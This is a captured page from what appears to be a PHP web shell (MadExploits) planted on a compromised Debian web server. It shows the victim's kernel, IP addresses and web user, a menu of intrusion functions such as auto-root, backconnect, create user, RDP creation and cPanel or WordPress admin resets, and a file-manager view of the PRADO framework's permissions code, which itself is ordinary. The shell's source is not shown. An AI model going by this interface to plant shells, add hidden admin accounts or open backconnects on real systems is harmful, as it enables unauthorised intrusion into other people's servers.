Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.91.116
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Security /
Permissions /
[ HOME SHELL ]
Name
Size
Permission
Action
IPermissions.php
1.2
KB
-rw-r--r--
TPermissionEvent.php
3.9
KB
-rw-r--r--
TPermissionsAction.php
12.11
KB
-rw-r--r--
TPermissionsBehavior.php
5.51
KB
-rw-r--r--
TPermissionsConfigurationBehav...
3.73
KB
-rw-r--r--
TPermissionsManager.php
34.08
KB
-rw-r--r--
TUserOwnerRule.php
1.18
KB
-rw-r--r--
TUserPermissionsBehavior.php
2.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TUserPermissionsBehavior.php
<?php /** * TUserPermissionsBehavior class file. * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Security\Permissions; use Prado\Prado; use Prado\Util\TBehavior; /** * TUserPermissionsBehavior class. * * TUserPermissionsBehavior is designed to attach to {@link TUser}. * This class adds {@link can} permissions functionality. It also * handles {@link dyDefaultRoles} and {@link dyIsInRole} of TUser. * * This passes through dyDefaultRoles and dyIsInRole to the {@link TPermissionsManager}. * * @author Brad Anderson <belisoful@icloud.com> * @since 4.2.0 * @method \Prado\Security\TUser getOwner() */ class TUserPermissionsBehavior extends TBehavior { /** @var \Prado\Security\Permissions\TPermissionsManager manager object for the behavior */ private $_manager; /** * @param null|\Prado\Security\Permissions\TPermissionsManager $manager */ public function __construct($manager = null) { if ($manager) { $this->setManager($manager); } parent::__construct(); } /** * Gets all the rules for the permission and checks against the TUser. * @param string $permission * @param null|mixed $extraData */ public function can($permission, $extraData = null) { $rules = $this->getManager()->getPermissionRules($permission); if (!$rules) { return true; //Default from TAuthorizationRuleCollection::isUserAllowed } $request = Prado::getApplication()->getRequest(); return $rules->isUserAllowed($this->getOwner(), $request->getRequestType(), $request->getUserHostAddress(), $extraData); } /** * @param string[] $roles The default roles of all users * @param \Prado\Util\TCallChain $callchain * @return string[] the default roles of all users */ public function dyDefaultRoles($roles, $callchain) { $roles = array_merge($roles, $this->getManager()->getDefaultRoles() ?? []); return $callchain->dyDefaultRoles($roles); } /** * This handles the dynamic event where the $role does not match the user * roles. It checks the hierarchy of roles/permissions * @param bool $return the return value, initially false * @param string $role * @param \Prado\Util\TCallChain $callchain */ public function dyIsInRole($return, $role, $callchain) { $inRole = $this->getManager()->isInHierarchy($this->getOwner()->getRoles(), $role); return $callchain->dyIsInRole($return, $role) || $inRole; } /** * @return \Prado\Security\Permissions\TPermissionsManager application permissions manager */ public function getManager() { return $this->_manager; } /** * @param \Prado\Security\Permissions\TPermissionsManager|\WeakReference $manager manages application permissions */ public function setManager($manager) { if (class_exists('\WeakReference', false) && $manager instanceof \WeakReference) { $manager = $manager->get(); } $this->_manager = $manager; } }
Close